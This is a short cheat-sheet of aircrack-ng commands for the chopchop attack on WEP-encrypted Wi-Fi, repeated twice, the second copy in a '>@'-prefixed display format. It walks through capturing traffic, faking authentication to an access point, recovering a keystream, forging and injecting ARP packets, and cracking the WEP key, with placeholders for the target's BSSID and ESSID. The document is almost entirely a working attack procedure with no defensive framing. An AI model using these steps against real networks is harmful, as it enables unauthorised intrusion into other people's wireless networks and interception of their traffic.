Chopchop attack
#BASICS

In 2004, when WEP had already been broken since officially 2001, Korek published the first version 
of a tool called chopchop which allows you to decrypt any encrypted packet without knowing the WEP 
key.

1. Put the wireless card in Monitor mode.

2. Access point verification.
$ sudo airodump-ng wlan0
>>> note the BSSID: MAC of the access point.
>>> note the ESSID:     name of the access point.

3. Packets recording with airodump-ng.
$ sudo airodump-ng --bssid <BSSID> channel <ch> -w chopchop wlan0

4. Performs a fake authentication.
Accelerate the number of authentication.
Use '-1' or '--fakeauth'.
$ sudo aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <kali MAC> wlan0
>>> -1 0 : do the fake just one time.
>>> authentification to the acces point. The acces point accepts our MAC address and will listen 
    our packets.

5. Attack with chopchop.
$ sudo aireplay-ng --chopchop -b <BSSID> -h <MAC kali> wlan0
>>> airreplay-ng searches for an ARP packet then ...
>>> ... propose "Use this packet ?". Say yed (y) then wait for the end of the operation. 
>>> note the name of the 'keystream' file. 

6. Forge a packet.
$ sudo packetforge-ng -0 -a <BSSID> -h <MAC kali> -k 255.255.255.255 -l 255.255.255.255. 
                      -y <keystream.xor file> -w paquetchopchop
>>> -0 means create an ARP packet.

7. Packet injection.
$ sudo aireplay-ng -2 -r paquetchopchop wlan0
>>> Say y (yes)

8. Stop the airodump-ng recorder (see 3.).
Use Ctrl-C.

9. Launch the crack on the recorded packet file (see 3.).
$ sudo aircrack-ng chopchop-01.cap

>@
>@#########################################################################################################
>@#                                                                                                       #
>@# [ Chopchop attack ]                                                                                   #
>@#                                                                                                       #
>@# In 2004, when WEP had already been broken since officially 2001, Korek published the first version    #
>@# of a tool called chopchop which allows you to decrypt any encrypted packet without knowing the WEP    #
>@# key.                                                                                                  #
>@#                                                                                                       #
>@#-------------------------------------------------------------------------------------------------------#
>@
>@1. Put the wireless card in Monitor mode.
>@
>@2. Access point verification.
>@$ sudo airodump-ng wlan0
>@>>> note the BSSID: MAC of the access point.
>@>>> note the ESSID:     name of the access point.
>@
>@3. Packets recording with airodump-ng.
>@$ sudo airodump-ng --bssid <BSSID> channel <ch> -w chopchop wlan0
>@
>@4. Performs a fake authentication.
>@Accelerate the number of authentication.
>@Use '-1' or '--fakeauth'.
>@$ sudo aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <kali MAC> wlan0
>@>>> -1 0 : do the fake just one time.
>@>>> authentification to the acces point. The acces point accepts our MAC address and will listen 
>@    our packets.
>@
>@5. Attack with chopchop.
>@$ sudo aireplay-ng --chopchop -b <BSSID> -h <MAC kali> wlan0
>@>>> airreplay-ng searches for an ARP packet then ...
>@>>> ... propose "Use this packet ?". Say yed (y) then wait for the end of the operation. 
>@>>> note the name of the 'keystream' file. 
>@
>@6. Forge a packet.
>@$ sudo packetforge-ng -0 -a <BSSID> -h <MAC kali> -k 255.255.255.255 -l 255.255.255.255. 
>@                      -y <keystream.xor file> -w paquetchopchop
>@>>> -0 means create an ARP packet.
>@
>@7. Packet injection.
>@$ sudo aireplay-ng -2 -r paquetchopchop wlan0
>@>>> Say y (yes)
>@
>@8. Stop the airodump-ng recorder (see 3.).
>@Use Ctrl-C.
>@
>@9. Launch the crack on the recorded packet file (see 3.).
>@$ sudo aircrack-ng chopchop-01.cap
>@
>@#########################################################################################################
>@

